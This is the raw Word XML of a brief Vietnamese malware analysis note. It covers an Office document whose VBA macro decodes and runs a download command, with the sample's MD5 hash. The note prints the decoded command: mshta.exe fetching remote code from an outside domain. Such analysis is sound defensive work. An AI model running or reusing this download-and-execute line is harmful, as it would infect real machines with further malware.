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27" w:rsidRDefault="00447481">
      <w:r>
        <w:t>Md5:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00447481">
        <w:t>3e4c773475d8df2d1da72180e574f37a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00447481" w:rsidRDefault="00447481">
      <w:r>
        <w:t>Phân loại: Office malware, VBA Download</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00447481" w:rsidRDefault="00447481">
      <w:r>
        <w:t>Luồng hoạt động chính</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A456B" w:rsidRDefault="00447481">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E2894F6" wp14:editId="57A4F866">
            <wp:extent cx="49625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8EB" w:rsidRDefault="00D948EB">
      <w:r>
        <w:t>File DOC có chứa code vba, trong đó gồm các mảng ký tự và các hàm để giả</w:t>
      </w:r>
      <w:r w:rsidR="00177199">
        <w:t>i mã</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177199" w:rsidRDefault="00177199">
      <w:r>
        <w:t>Kết quả sau khi thực hiện giải mã là</w:t>
      </w:r>
      <w:r w:rsidR="00E53230">
        <w:t xml:space="preserve"> chuỗi sau</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177199" w:rsidRDefault="00107D2D">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00177199" w:rsidRPr="00D948EB">
        <w:t>mshta.exe http://ijdqnwdquwdoasidj.com/RPG/sof.php?utma=ops</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D948EB" w:rsidRDefault="00177199">
      <w:r>
        <w:t>Sau đó nó gọi vba.shell với tham số như trên để download mã độc khác về</w:t>
      </w:r>
      <w:r w:rsidR="00F72DEB">
        <w:t xml:space="preserve"> máy</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D9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81"/>
    <w:rsid w:val="00107D2D"/>
    <w:rsid w:val="00177199"/>
    <w:rsid w:val="003C0F27"/>
    <w:rsid w:val="00447481"/>
    <w:rsid w:val="008A456B"/>
    <w:rsid w:val="00D948EB"/>
    <w:rsid w:val="00DB2AC8"/>
    <w:rsid w:val="00E53230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5A72"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{01299A34-A252-4BE1-BB09-5D3C5BD9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2018-04-09T09:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-04-10T01:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>